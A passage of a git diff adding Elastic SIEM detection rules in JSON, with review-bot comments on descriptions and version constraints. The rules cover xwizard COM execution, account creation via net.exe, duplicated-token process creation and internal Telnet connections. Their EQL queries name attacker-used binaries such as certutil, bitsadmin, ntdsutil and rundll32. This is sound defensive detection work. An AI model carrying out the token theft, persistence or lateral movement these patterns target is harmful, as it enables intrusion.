"name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as 
beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1a6075b0-7479-450e-8fe7-b8b8438ac570_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_109.json b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_109.json new file mode 100644 index 00000000000..62e1c0d3249 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1a6075b0-7479-450e-8fe7-b8b8438ac570_109.json 
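Review bot: The description only explains the COM/`RunWizard` branch of the query, but the second disjunct, `process.executable != null and not process.executable : ("C:\\Windows\\SysWOW64\\xwizard.exe", "C:\\Windows\\System32\\xwizard.exe")`, alerts on any process named (or PE-originally named) `xwizard.exe` running from a location other than the two system directories, regardless of its arguments; that relocated-binary signal should be stated so analysts know why an alert with no CLSID argument fired. I would append to the description something like `The rule also alerts when xwizard.exe (by process name or PE original file name) runs from a path other than System32 or SysWOW64.`. Separately, the `index` list queries `logs-windows.*` and `logs-system.security*`, yet `tags` names no data source for them, whereas the `17c7f6a5` rule earlier in this commit tags `Data Source: Sysmon` for its Sysmon index; the `_109` copy of this rule that starts at the next file header carries the same description and tags and would need the same update.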
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Windows Component Object Model (COM) is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects or executable code. Xwizard can be used to run a COM object created in registry to evade defensive counter measures.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of COM object via Xwizard", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"xwizard.exe\" or ?process.pe.original_file_name : \"xwizard.exe\") and\n (\n (process.args : \"RunWizard\" and process.args : \"{*}\") or\n (process.executable != null and\n not process.executable : (\"C:\\\\Windows\\\\SysWOW64\\\\xwizard.exe\", \"C:\\\\Windows\\\\System32\\\\xwizard.exe\")\n )\n )\n", + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1a6075b0-7479-450e-8fe7-b8b8438ac570", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index 
(such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1559", + "name": "Inter-Process Communication", + "reference": "https://attack.mitre.org/techniques/T1559/", + "subtechnique": [ + { + "id": "T1559.001", + "name": "Component Object Model", + "reference": "https://attack.mitre.org/techniques/T1559/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1a6075b0-7479-450e-8fe7-b8b8438ac570_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_108.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_108.json new file mode 100644 index 00000000000..21f60572bda --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_108.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create new users. This is sometimes done by attackers to increase access or establish persistence on a system or domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "User Account Creation", + "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n- Windows User Account Creation - 38e17753-f581-4644-84da-0d60a8318694\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"net.exe\", \"net1.exe\") and\n not process.parent.name : \"net.exe\" and\n (process.args : \"user\" and process.args : (\"/ad\", \"/add\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "1aa9181a-492b-4c01-8b16-fa0735786b2b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_109.json b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_109.json new file mode 100644 index 00000000000..38327b7ce79 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1aa9181a-492b-4c01-8b16-fa0735786b2b_109.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create new users. This is sometimes done by attackers to increase access or establish persistence on a system or domain.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "User Account Creation", + "note": "## Triage and analysis\n\n### Investigating User Account Creation\n\nAttackers may create new accounts (both local and domain) to maintain access to victim systems.\n\nThis rule identifies the usage of `net.exe` to create new accounts.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Identify if the account was added to privileged groups or assigned special privileges after creation.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Account creation is a common administrative task, so there is a high chance of the activity being legitimate. 
Before investigating further, verify that this activity is not benign.\n\n### Related rules\n\n- Creation of a Hidden Local User Account - 2edc8076-291e-41e9-81e4-e3fcbc97ae5e\n- Windows User Account Creation - 38e17753-f581-4644-84da-0d60a8318694\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Delete the created account.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : (\"net.exe\", \"net1.exe\") and\n not process.parent.name : \"net.exe\" and\n (process.args : \"user\" and process.args : (\"/ad\", \"/add\"))\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "1aa9181a-492b-4c01-8b16-fa0735786b2b", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1136", + "name": "Create Account", + "reference": "https://attack.mitre.org/techniques/T1136/", + "subtechnique": [ + { + "id": "T1136.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1136/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "1aa9181a-492b-4c01-8b16-fa0735786b2b_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_2.json b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_2.json new file mode 100644 index 00000000000..8996d994782 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_2.json 
@@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process impersonating the token of another user logon session. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Created with a Duplicated Token", + "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n (process.Ext.effective_parent.executable regex~ \"\"\"[C-Z]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9\\-\\_\\.]+\\.exe\"\"\" or\n process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\") and\n\n (\n process.name : (\"powershell.exe\", \"cmd.exe\", \"rundll32.exe\", \"notepad.exe\", \"net.exe\", \"ntdsutil.exe\",\n \"tasklist.exe\", \"reg.exe\", \"certutil.exe\", \"bitsadmin.exe\", \"msbuild.exe\", \"esentutl.exe\") or\n\n ((process.Ext.relative_file_creation_time <= 900 or process.Ext.relative_file_name_modify_time <= 900) and\n not process.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n not process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ) and\n not (process.name : \"rundll32.exe\" and\n process.command_line : (\"*davclnt.dll,DavSetCookie*\", \"*?:\\\\Program Files*\",\n \"*\\\\Windows\\\\System32\\\\winethc.dll*\", \"*\\\\Windows\\\\SYSTEM32\\\\EDGEHTML.dll*\",\n \"*shell32.dll,SHCreateLocalServerRunDll*\")) and\n not startswith~(process.Ext.effective_parent.name, process.parent.name) and \n not (process.name : \"powershell.exe\" and process.parent.name : \"wmiprvse.exe\" and process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\") and \n not 
(process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\sihost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\sethc.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\" and \n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\twain_32\\\\*.exe\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1b0b4818-5655-409b-9c73-341cac4bb73f", + "severity": 
"medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + }, + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "1b0b4818-5655-409b-9c73-341cac4bb73f_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_3.json b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_3.json new file mode 100644 index 00000000000..cf27bd6ba22 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b0b4818-5655-409b-9c73-341cac4bb73f_3.json 
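Review bot: The query opens with `/* This rule is only compatible with Elastic Endpoint 8.4+ */`, yet `related_integrations` pins the endpoint package at `"version": "^8.2.0"`, so the declared integration requirement admits versions the rule itself says it cannot run on. The `process.Ext.relative_file_creation_time` and `process.Ext.relative_file_name_modify_time` fields the query depends on are listed in `required_fields` as non-ECS with `"type": "unknown"`, which is the kind of field a tighter constraint is meant to guard; if the constraint is intended to express the rule's real minimum, it should read `"version": "^8.4.0"`. The same mismatch is present in the following hunk for `1b0b4818-5655-409b-9c73-341cac4bb73f_3.json`. If these files are exported from an upstream rule source, the correction presumably belongs there rather than in this JSON.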
@@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a process impersonating the token of another user logon session. Adversaries may create a new process with a different token to escalate privileges and bypass access controls.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Process Created with a Duplicated Token", + "query": "/* This rule is only compatible with Elastic Endpoint 8.4+ */\n\nprocess where host.os.type == \"windows\" and event.action == \"start\" and\n\n user.id : (\"S-1-5-21-*\", \"S-1-12-1-*\") and\n\n (process.Ext.effective_parent.executable regex~ \"\"\"[C-Z]:\\\\Windows\\\\(System32|SysWOW64)\\\\[a-zA-Z0-9\\-\\_\\.]+\\.exe\"\"\" or\n process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\") and\n\n (\n process.name : (\"powershell.exe\", \"cmd.exe\", \"rundll32.exe\", \"notepad.exe\", \"net.exe\", \"ntdsutil.exe\",\n \"tasklist.exe\", \"reg.exe\", \"certutil.exe\", \"bitsadmin.exe\", \"msbuild.exe\", \"esentutl.exe\") or\n\n ((process.Ext.relative_file_creation_time <= 900 or process.Ext.relative_file_name_modify_time <= 900) and\n not process.code_signature.status : (\"trusted\", \"errorExpired\", \"errorCode_endpoint*\") and\n not process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\"))\n ) and\n not (process.name : \"rundll32.exe\" and\n process.command_line : (\"*davclnt.dll,DavSetCookie*\", \"*?:\\\\Program Files*\",\n \"*\\\\Windows\\\\System32\\\\winethc.dll*\", \"*\\\\Windows\\\\SYSTEM32\\\\EDGEHTML.dll*\",\n \"*shell32.dll,SHCreateLocalServerRunDll*\")) and\n not startswith~(process.Ext.effective_parent.name, process.parent.name) and \n not (process.name : \"powershell.exe\" and process.parent.name : \"wmiprvse.exe\" and process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\wsmprovhost.exe\") and \n not 
(process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\RuntimeBroker.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\sihost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\System32\\\\sethc.exe\" and process.parent.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\") and \n not (process.Ext.effective_parent.executable : \"?:\\\\Windows\\\\explorer.exe\" and \n process.parent.executable : (\"?:\\\\Windows\\\\System32\\\\svchost.exe\", \"?:\\\\Windows\\\\System32\\\\msiexec.exe\", \"?:\\\\Windows\\\\twain_32\\\\*.exe\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.executable", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.effective_parent.name", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_creation_time", + "type": "unknown" + }, + { + "ecs": false, + "name": "process.Ext.relative_file_name_modify_time", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1b0b4818-5655-409b-9c73-341cac4bb73f", + "severity": 
"medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/", + "subtechnique": [ + { + "id": "T1134.001", + "name": "Token Impersonation/Theft", + "reference": "https://attack.mitre.org/techniques/T1134/001/" + }, + { + "id": "T1134.002", + "name": "Create Process with Token", + "reference": "https://attack.mitre.org/techniques/T1134/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "1b0b4818-5655-409b-9c73-341cac4bb73f_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107.json b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107.json new file mode 100644 index 00000000000..8650bc488e4 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b21abcc-4d9f-4b08-a7f5-316f5f94b973_107.json 
@@ -0,0 +1,87 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses.", + "false_positives": [ + "Telnet can be used for both benign or malicious purposes. Telnet is included by default in some Linux distributions, so its presence is not inherently suspicious. The use of Telnet to manage devices remotely has declined in recent years in favor of more secure protocols such as SSH. Telnet usage by non-automated tools or frameworks may be suspicious." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Connection to Internal Network via Telnet", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and process.name == \"telnet\" and event.type == \"start\"]\n [network where host.os.type == \"linux\" and process.name == \"telnet\" and cidrmatch(\n destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\", \"192.0.0.0/29\",\n \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\", \"192.0.2.0/24\",\n \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\",\n \"192.175.48.0/24\", \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\", \"FE80::/10\",\n \"FF00::/8\"\n )\n ]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1b21abcc-4d9f-4b08-a7f5-316f5f94b973", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": 